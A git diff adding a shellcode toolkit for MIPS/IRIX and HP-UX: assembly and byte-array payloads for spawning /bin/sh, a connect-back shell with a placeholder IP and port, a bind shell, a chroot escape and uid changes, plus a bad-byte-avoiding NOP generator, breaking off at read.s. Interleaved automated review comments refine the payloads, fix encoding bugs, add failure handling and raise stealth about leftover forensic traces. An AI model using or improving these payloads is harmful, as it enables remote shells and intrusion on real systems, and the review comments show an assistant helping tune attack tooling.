diff --git a/other/shellkit/hppa_hpux/execvesh.s-backup b/other/shellkit/hppa_hpux/execvesh.s-backup new file mode 100644 index 0000000..c2d3559 --- /dev/null +++ b/other/shellkit/hppa_hpux/execvesh.s-backup @@ -0,0 +1,32 @@ + + .LEVEL 1.1 + + .SPACE $TEXT$ + + .align 4 + .EXPORT cbegin,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR + +cbegin + .PROC + .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3 + + bl moo,%r26 +moo + xor %r25,%r25,%r25 + addi,< 0x11,%r26,%r26 + stbs %r0,7(%r26) + ldil L%0xc0000004,%r21 + ble R%0xc0000004(%sr7,%r21) + ldo 0xb(%r0),%r22 + + .STRING "/bin/sh\x41" + + .PROCEND + + + .EXPORT cend,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,RTNVAL=GR +cend + .PROC + .CALLINFO FRAME=128,CALLS,SAVE_RP,SAVE_SP,ENTRY_GR=3 + + .PROCEND diff --git a/other/shellkit/mips.c b/other/shellkit/mips.c new file mode 100644 index 0000000..dda3f92 --- /dev/null +++ b/other/shellkit/mips.c 
@@ -0,0 +1,143 @@ +/* mips.c - generic mips functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "mips.h" + +static unsigned long int mips_nop_rwreg (void); +static unsigned long int mips_nop_roreg (void); +static unsigned long int mips_nop_xfer (char *xferstr); + +/* mips generic isa "nop" space generator + */ + +/* get random read write register (i.e. not sp, everything else allowed) + */ +static unsigned long int +mips_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 31); + } while (reg == 29); /* 29 = $sp */ + + return (reg); +} + + +static unsigned long int +mips_nop_roreg (void) +{ + return (random_get (0, 31)); +} + + +static unsigned long int +mips_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned long int tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 5, mips_nop_roreg (), bw); + break; + case ('w'): + BSET (tgt, 5, mips_nop_rwreg (), bw); + break; + case ('c'): + BSET (tgt, 16, random_get (0, 0xffff), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 32) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +mips_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "000000.r.r.w.00000.000100", /* sllv rs rt rd */ + "000000.r.r.w.00000.000110", /* srlv rs rt rd */ + "000000.r.r.w.00000.000111", /* srav rs rt rd */ + "000000.r.r.w.00000.100001", /* addu rs rt rd */ + "000000.r.r.w.00000.100011", /* subu rs rt rd */ + 
"000000.r.r.w.00000.100100", /* and rs rt rd */ + "000000.r.r.w.00000.100101", /* or rs rt rd */ + "000000.r.r.w.00000.100110", /* xor rs rt rd */ + "000000.r.r.w.00000.100111", /* nor rs rt rd */ + "000000.r.r.w.00000.101010", /* slt rs rt rd */ + "000000.r.r.w.00000.101011", /* sltu rs rt rd */ + "001001.r.w.c", /* addiu rs rd const */ + "001010.r.w.c", /* slti rs rd const */ + "001011.r.w.c", /* sltiu rs rd const */ + "001100.r.w.c", /* andi rs rd const */ + "001101.r.w.c", /* ori rs rd const */ + "001110.r.w.c", /* xori rs rd const */ + "001111.00000.w.c", /* lui rd const */ + NULL, + }; + unsigned long int tgt; + + if (dest_len % 4) { + fprintf (stderr, "off by %d padding of dest_len (= %u), rounding down\n", + dest_len % 4, dest_len); + dest_len -= (dest_len % 4); + } + + for (walk = 0 ; dest_len > 0 ; dest_len -= 4 , walk += 4) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 17)]; + tgt = mips_nop_xfer (xs); + + dest[walk + 0] = (tgt >> 24) & 0xff; + dest[walk + 1] = (tgt >> 16) & 0xff; + dest[walk + 2] = (tgt >> 8) & 0xff; + dest[walk + 3] = tgt & 0xff; + if (badstr (&dest[walk], 4, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + + diff --git a/other/shellkit/mips.h b/other/shellkit/mips.h new file mode 100644 index 0000000..98f8999 --- /dev/null +++ b/other/shellkit/mips.h @@ -0,0 +1,19 @@ + +#ifndef MIPS_H +#define MIPS_H + +/* mips_nop + * + * create `dest_len' bytes of nopspace at `dest', which does not contain any + * of the bytes in `bad', which is a char array, `bad_len' in size + * + * return number of bytes generated + */ + +unsigned int +mips_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#endif + + 
diff --git a/other/shellkit/mips.o b/other/shellkit/mips.o new file mode 100644 index 0000000..7f753ca Binary files /dev/null and b/other/shellkit/mips.o differ diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c new file mode 100644 index 0000000..33bf38c --- /dev/null +++ b/other/shellkit/mips_irix.c 
@@ -0,0 +1,231 @@ + +#include +#include +#include +#include "shellcode.h" +#include "mips.h" + + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_chmod = { + "mips-irix-chmod", + 64, + "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55" + /* ^^ ^^ = uid ^ 0x5555 */ + "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80" + /* ^^ ^^ = gid ^ 0x5555 */ + "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8" + /* ^^ ^^ = length of appended pathname + 0xfeb8 */ + "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7" + "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c" + "\x24\x18\x72\xec", +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_chroot = { + "mips-irix-chroot", + 84, + "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e" + "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0" + "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c" + "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11" + "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c" + "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26" + "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50", +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_connectsh = { + "mips-irix-connectsh", + 172, + "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" + "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" + "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" + "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42" + /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. 
*/ + "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8" + /* ^^ ^^ ip .3.4 */ + "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23" + "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2" + "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee" + "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff" + "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c" + "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc" + "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20" + "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8" + "\x24\x02\x04\x23\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_execvesh = { + "mips-irix-execvesh", + 48, + "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc" + "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" + "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23" + "\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +shellcode mips_irix_exit = { + "mips-irix-exit", + 16, + "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c" + "\x24\x18\x73\x50", +}; + +/* tested on: IP20 R4000 6.5 + * IP30 R10000 6.5.7m (thanks oxigen ;) + */ +shellcode mips_irix_portshellsh = { + "mips-irix-portshellsh", + 188, /* yay! 
well optimized */ + "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" + "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" + "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" + "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */ + "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0" + "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c" + "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec" + "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c" + "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03" + "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff" + "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26" + "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6" + "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8" + "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" + "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_read = { + "mips-irix-read", + 56, + "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31" + "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb" + "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10" + "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f" + "\x01\x01\x01\x0c\x24\x18\x73\x50", +}; + +shellcode mips_irix_setgid = { + "mips-irix-setgid", + 16, + "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */ + "\x01\x01\x01\x0c", +}; + +shellcode mips_irix_setreuid = { + "mips-irix-setreuid", + 24, + "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55" + /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */ + "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c", +}; + + +shellcode * mips_irix_shellcodes[] = { + &mips_irix_chmod, + &mips_irix_chroot, + &mips_irix_connectsh, + &mips_irix_execvesh, + &mips_irix_exit, + &mips_irix_portshellsh, + &mips_irix_read, + &mips_irix_setgid, + &mips_irix_setreuid, + NULL, +}; + + +arch mips_irix = { + "mips-irix", + 4, + mips_nop, + mips_irix_shellcodes, +}; + + + +/* set the uid, gid 
and pathname of the mips-irix-chmod code at `code' + * XXX: be sure to have strlen(pathname) bytes left after code + */ +void +mips_irix_chmod_setup (unsigned char *code, char *pathname, + unsigned short int uid, unsigned short int gid) +{ + unsigned short int len = 0xfeb8; + + uid ^= 0x5555; + code[6] = (uid >> 8) & 0xff; + code[7] = uid & 0xff; + + gid ^= 0x5555; + code[14] = (gid >> 8) & 0xff; + code[15] = gid & 0xff; + + len += strlen (pathname); + code[26] = (len >> 8) & 0xff; + code[27] = len & 0xff; + + memcpy (code + 64, pathname, strlen (pathname)); + + return; +} + + +/* ip and port in network byte order + */ +void +mips_irix_connectsh_setup (unsigned char *code, + unsigned long int ip, unsigned short int port) +{ + code[38] = (port >> 8) & 0xff; + code[39] = port & 0xff; + + code[46] = (ip >> 24) & 0xff; + code[47] = (ip >> 16) & 0xff; + code[50] = (ip >> 8) & 0xff; + code[51] = ip & 0xff; + + return; +} + + +/* set the gid within the 'mips-irix-setgid' code at `code' + */ +void +mips_irix_setgid_setup (unsigned char *code, unsigned short int gid) +{ + gid ^= 0x5555; + + code[2] = (gid >> 8) & 0xff; + code[3] = gid & 0xff; + + return; +} + + +void +mips_irix_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid) +{ + ruid ^= 0x5555; + code[2] = (ruid >> 8) & 0xff; + code[3] = ruid & 0xff; + + euid ^= 0x5555; + code[6] = (euid >> 8) & 0xff; + code[7] = euid & 0xff; + + return; +} + + diff --git a/other/shellkit/mips_irix.h b/other/shellkit/mips_irix.h new file mode 100644 index 0000000..68c633a --- /dev/null +++ b/other/shellkit/mips_irix.h @@ -0,0 +1,17 @@ + +#ifndef MIPS_IRIX_H +#define MIPS_IRIX_H + +#include "shellcode.h" + +arch mips_irix; + +void +mips_irix_setgid_setup (unsigned char *code, unsigned short int gid); + +void +mips_irix_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid); + +#endif + 
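Review bot: `mips_irix_chmod_setup` encodes the gid with `gid ^= 0x5555`, but the instruction it patches is decoded in `mips_irix_chmod` by `\x38\xc6\x05\x55` (`xori a2, a2, 0x0555`), so chown() receives `gid ^ 0x5000`; the bytes should be `\x38\xc6\x55\x55` to match both the uid path and the setup routine. The same setup adds `strlen (pathname)` to the `addiu a0, a0, 0xfeb8` immediate at `code[26..27]`, which appears to move a0 to the end of the appended path rather than its start, whereas chmod.s folds the length into the `sb zero, ...(a0)` displacement (bytes 22–23 here, currently `\x00\x00`) so only the terminator moves — the source is already marked `FIXME: its not workable atm`, and that caveat belongs on this C entry too so it is not picked from the `shellkit -l` listing as working code. `mips_irix_connectsh_setup` is commented as taking "network byte order" yet shifts `port` and `ip` as integers into big-endian immediates, which is only correct for plain numeric values (`4141`, `0x0a000001`) and not for `htons()`/`htonl()` output produced on a little-endian build host; reword it to `/* ip and port as plain host-order numbers; emitted big-endian into the immediates */`. Finally `mips_irix_chmod_setup` memcpy()s `strlen (pathname)` bytes past `code + 64` with no size argument and stores `0xfeb8 + strlen (pathname)` in an `unsigned short`, so a path longer than 0x147 bytes both overruns the caller's buffer and wraps the offset; take a `code_size` parameter and reject paths that do not fit.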
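Review bot: `arch mips_irix;` in the header is a tentative definition rather than a declaration, so every translation unit that includes mips_irix.h (shellkit.h does) emits its own `mips_irix` object and the link only succeeds through common-symbol merging, which recent gcc releases disable by default; write `extern arch mips_irix;` and keep the single definition in mips_irix.c. The header also omits prototypes for `mips_irix_chmod_setup` and `mips_irix_connectsh_setup`, both defined in mips_irix.c, so any caller outside that file would rely on implicit declarations; add `void mips_irix_chmod_setup (unsigned char *code, char *pathname, unsigned short int uid, unsigned short int gid);` and `void mips_irix_connectsh_setup (unsigned char *code, unsigned long int ip, unsigned short int port);`.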
diff --git a/other/shellkit/mips_irix.o b/other/shellkit/mips_irix.o new file mode 100644 index 0000000..b5313da Binary files /dev/null and b/other/shellkit/mips_irix.o differ diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile new file mode 100644 index 0000000..a68d231 --- /dev/null +++ b/other/shellkit/mips_irix/Makefile @@ -0,0 +1,22 @@ + +#DFLAGS=-O2 +DFLAGS=-g -ggdb +CC=gcc +CFLAGS=$(DFLAGS) -Wall -DIRIX + +all: + $(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s + $(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s + $(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s + $(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s + $(CC) $(CFLAGS) -o exit ../codedump.c exit.s + $(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s + $(CC) $(CFLAGS) -o read ../codedump.c read.s + $(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s + $(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s + +clean: + rm -f code.h codetest \ + chmod chroot connectsh execvesh exit portshellsh read \ + setgid setreuid + diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README new file mode 100644 index 0000000..a78c668 --- /dev/null +++ b/other/shellkit/mips_irix/README @@ -0,0 +1,25 @@ + +mips/irix shellcodes +some comments in this file + + +for execvesh and portshellsh append "/bin/sh\x42" to the code. + +if you want to execute something different than "/bin/sh", be sure to properly +set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop +and adjust the self-relocation. + +the codedump utility build extra cache control syscalls, so it flushes all +caches properly and you can run the code safily then from a flushed cache. + +example: + +scut@hyperion $ make >/dev/null +scut@hyperion $ ./execvesh + <... dumps the hexcode ...> +scut@hyperion $ ./execvesh exec +len = 68 +$ +$ exit +scut@hyperion $ + 
diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s new file mode 100644 index 0000000..181c123 --- /dev/null +++ b/other/shellkit/mips_irix/chmod.s @@ -0,0 +1,49 @@ +/* MIPS/IRIX PIC chmod code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + + /* FIXME: its not workable atm */ +cbegin: + .set noreorder + .set nomacro + +lbl: bltzal zero, lbl + + li a1, 0x4141 /* a1 = uid ^ 0x5555 */ + xor a1, a1, 0x5555 + li a2, 0x4242 /* a2 = gid ^ 0x5555 */ + xor a2, a2, 0x555 + + addu a0, ra, 0x0180 + sb zero, -(0x0148 + -(9))(a0) + subu a0, a0, 0x0148 + + /* chown (a0 = pathname, a1 = uid, a2 = gid) */ + li v0, SYS_chown /* 0x03f8 */ + syscall + + /* chmod (a0 = pathname, a1 = 04755) */ + li a1, 0x09ed /* a1 = 04755 = 0x09ed */ + li v0, SYS_chmod /* 0x03f7 */ + syscall + + li v0, SYS_exit /* 0x03e9 */ + syscall + li t8, 0x72ec /* sane ds */ + + .end cbegin +cend: + + /* XXX: append pathname here, will get NUL terminated */ diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s new file mode 100644 index 0000000..96a1595 --- /dev/null +++ b/other/shellkit/mips_irix/chroot.s 
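Review bot: The gid decode `xor a2, a2, 0x555` drops a digit relative to its own comment (`a2 = gid ^ 0x5555`) and to `mips_irix_chmod_setup`, which encodes the gid with 0x5555, so chown() is handed a gid off by 0x5000; the line should read `xor a2, a2, 0x5555`. The `FIXME: its not workable atm` is the right caveat, but the byte array committed to mips_irix.c does not correspond to this source either (its `sb` carries a zero displacement with embedded NULs, `\xa0\x80\x00\x00`, while this file computes `-(0x0148 + -(9))`), so one of the two must be regenerated from the other before the FIXME can go.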
@@ -0,0 +1,60 @@ +/* MIPS/IRIX PIC chroot break + * without 0x00, 0x0a, 0x0d, 0x25 + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + +foo: bltzal zero, foo + li a1, 0700 /* a1 = 0700 permission */ + + /* mkdir ("Y..", 0700); + */ + lui t2, 0x592e + ori t2, 0x2cff /* t1 = "Y..\x00" */ + add t2, t2, 0x0101 + sw t2, -48(ra) + + subu a0, ra, 48 /* a0 = "Y.." */ + li v0, SYS_mkdir /* 0x0438 */ + syscall + + /* chroot ("Y.."); + * a0 still points to it + */ + addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */ + syscall + + /* chdir ("..") a few times + */ + li s2, 0x1211 /* 12 times chdir ("..") */ + +foo2: subu a0, ra, 47 /* "..\x00" */ + li v0, SYS_chdir /* 0x03f4 */ + syscall + sub s2, 0x0101 + bgez s2, foo2 + + addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */ + subu a0, ra, 46 /* ".\x00" */ + syscall + li t2, 0x7350 /* NOP */ + + .end cbegin +cend: + nop + diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s new file mode 100644 index 0000000..7b77d4e --- /dev/null +++ b/other/shellkit/mips_irix/connectsh.s 
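Review bot: The escape leaves its scaffolding behind: `mkdir ("Y..", 0700)` creates a directory inside the jail that is never removed, a durable forensic artifact on the target that deserves a note next to the mkdir block, e.g. `/* XXX: leaves "Y.." behind inside the jail; rmdir it from the shell if stealth matters */`. The comment on the `ori t2, 0x2cff` line says `t1 = "Y..\x00"` while the register is t2, and the `0700` mode is the only octal literal in a file whose other constants are hex, which is easy to misread when hand-patching the bytes.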
@@ -0,0 +1,109 @@ +/* MIPS/IRIX PIC connect shell shellcode + * no 0x00, 0x0a, 0x0d, 0x25 bytes + * + * -sc + */ + + /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */ + +#include +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) + */ + li s6, 0x7350 + subu a0, s6, 0x734e /* AF_INET = 2 */ + subu a1, s6, 0x734e /* SOCK_STREAM = 2 */ + subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */ + li v0, SYS_socket /* 0x0453 */ + syscall + + /* socket returned in v0, save to a0 + */ + andi a0, v0, 0xffff /* a0 = socket */ + + /* build struct sockaddr_in + * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000 + */ + subu t2, s6, 0x734e /* t2 = 0x0002 */ + sh t2, -16(sp) + li t2, 0x4141 /* t2 = port number */ + sh t2, -14(sp) + + /* ip address */ + lui t2, 0x4142 + ori t2, t2, 0x4344 + sw t2, -12(sp) + + sw zero, -8(sp) + sw zero, -4(sp) + + /* connect (socket, (struct sockaddr *) cs, + * sizeof (struct sockaddr_in) + */ + subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */ + subu a1, sp, a2 /* a1 = (struct sockaddr *) */ + li v0, SYS_connect /* 0x0443 */ + syscall + + /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2) + */ + subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */ + + /* socket returned in v0, save in s7 + */ + andi s7, a0, 0xffff + + /* dup is emulated through close and fcntl, since irix offers no + * native dup syscall as for example linux. 
see phrack 56 for details + */ +dup_loop: + andi a0, s3, 0x0103 /* a0 = STD*_FILENO */ + li v0, SYS_close /* 0x03ee */ + syscall + + andi a0, s7, 0xffff /* a0 = socket */ + slti a1, zero, -1 /* a1 = 0 */ + andi a2, s3, 0x0103 /* a2 = STD*_FILENO */ + li v0, SYS_fcntl /* 0x0426 */ + syscall + + subu s3, 0x1011 + bgez s3, dup_loop + + /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL) + */ + sw zero, -4(sp) + + /* a2 (envp) is already zero due to the dup_loop + */ +gaddr: bltzal zero, gaddr /* rock on-. lsd */ + subu a1, sp, 8 + + /* ra contains the proper address now */ + addu ra, ra, 0x0120 /* add 32 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) /* store NUL */ + sw a0, -8(sp) + li v0, SYS_execve + syscall + + .end cbegin +cend: + + /* XXX append here: "/bin/sh\x42" */ + diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s new file mode 100644 index 0000000..89fd45b --- /dev/null +++ b/other/shellkit/mips_irix/execvesh.s @@ -0,0 +1,36 @@ +/* MIPS/IRIX PIC execve code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + sw zero, -4(sp) +foo: bltzal zero, foo + lw a2, -4(sp) + + addu ra, ra, 0x0124 /* add 36 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) + sw a0, -8(sp) + subu a1, sp, 8 + li v0, SYS_execve + syscall + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s new file mode 100644 index 0000000..aef7d01 --- /dev/null +++ b/other/shellkit/mips_irix/exit.s @@ -0,0 +1,29 @@ +/* MIPS/IRIX PIC exit code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* _exit (0) */ + slti a0, zero, -1 + li v0, SYS_exit /* 0x03e9 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + 
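Review bot: None of the socket(), connect() or fcntl() results are checked, so a refused or filtered connection still runs through the dup loop and exec()s `/bin/sh` with its descriptors pointed at an unconnected socket, a silent failure the operator cannot tell from a working shell until the target shell exits on its first read. If IRIX follows the usual MIPS convention of flagging a failed syscall in a3, a `bnez a3, fail` after the connect `syscall` (with a bad-byte-free filler such as `li t8, 0x7350` in the delay slot) branching to an `_exit` costs eight bytes and contains the failure. The comment `socket returned in v0, save in s7` above `andi s7, a0, 0xffff` is stale — the fd is taken from a0 because connect() has overwritten v0 — so it should read `socket is still in a0 (connect clobbered v0), save in s7`. The header note `replace syscall instructions with "\x01\x01\x01\x0c"` is applied in the mips_irix.c byte array but not here, so this source still assembles a NUL-containing `syscall`; emitting `.word 0x0101010c` directly keeps the source and the shipped bytes in agreement.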
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s new file mode 100644 index 0000000..18070f6 --- /dev/null +++ b/other/shellkit/mips_irix/portshellsh.s 
@@ -0,0 +1,126 @@ +/* MIPS/IRIX PIC listening port shellcode + * no 0x00, 0x0a, 0x0d, 0x25 bytes + * + * bind a shell to tcp port 0x4141 + * + * 2001/05/25 optimized from 368 down to 188 bytes -sc. + * + */ + + /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */ + +#include +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) + */ + li s6, 0x7350 + subu a0, s6, 0x734e /* AF_INET = 2 */ + subu a1, s6, 0x734e /* SOCK_STREAM = 2 */ + subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */ + li v0, SYS_socket /* 0x0453 */ + syscall + + /* socket returned in v0, save to a0 + */ + andi a0, v0, 0xffff /* a0 = socket */ + + /* build struct sockaddr_in + * 0x0002port 0x00000000 0x00000000 0x00000000 + */ + subu t2, s6, 0x734e /* t2 = 0x0002 */ + sh t2, -16(sp) + li t2, 0x4141 /* t2 = port number */ + sh t2, -14(sp) + sw zero, -12(sp) + sw zero, -8(sp) + sw zero, -4(sp) + + /* bind (socket, (struct sockaddr *) srv_addr, + * sizeof (struct sockaddr_in) + */ + subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */ + subu a1, sp, a2 /* a1 = (struct sockaddr *) */ + li v0, SYS_bind /* 0x0442 */ + syscall + + /* listen (socket, backlog) + * XXX: is it safe here to make backlog = pointer-on-the-stack ? 
+ * should be, since its still a positive number + */ +/* subu a1, s6, 0x7340 *//* a1 = backlog = 0x10 */ + li v0, SYS_listen /* 0x0448 */ + syscall + + /* accept (socket, (struct sockaddr *) cl_addr, + * &socklen) + * XXX: a1 is still the pointer to the sockaddr struct + * a2 should be 0x10 still + */ + sw a2, -20(sp) + subu a2, sp, 20 /* a2 = &socklen */ + li v0, SYS_accept /* 0x0441 */ + syscall + + + /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2) + */ + subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */ + + /* socket returned in v0, save in s7 + */ + andi s7, v0, 0xffff + + /* dup is emulated through close and fcntl, since irix offers no + * native dup syscall as for example linux. see phrack 56 for details + */ +dup_loop: + andi a0, s3, 0x0103 /* a0 = STD*_FILENO */ + li v0, SYS_close /* 0x03ee */ + syscall + + andi a0, s7, 0xffff /* a0 = socket */ + slti a1, zero, -1 /* a1 = 0 */ + andi a2, s3, 0x0103 /* a2 = STD*_FILENO */ + li v0, SYS_fcntl /* 0x0426 */ + syscall + + subu s3, 0x1011 + bgez s3, dup_loop + + /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL) + */ + sw zero, -4(sp) + + /* a2 (envp) is already zero due to the dup_loop + */ +gaddr: bltzal zero, gaddr /* rock on-. lsd */ + subu a1, sp, 8 + + /* ra contains the proper address now */ + addu ra, ra, 0x0120 /* add 32 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) /* store NUL */ + sw a0, -8(sp) + li v0, SYS_execve + syscall + + .end cbegin +cend: + + /* XXX append here: "/bin/sh\x42" */ + diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s new file mode 100644 index 0000000..90ab25d --- 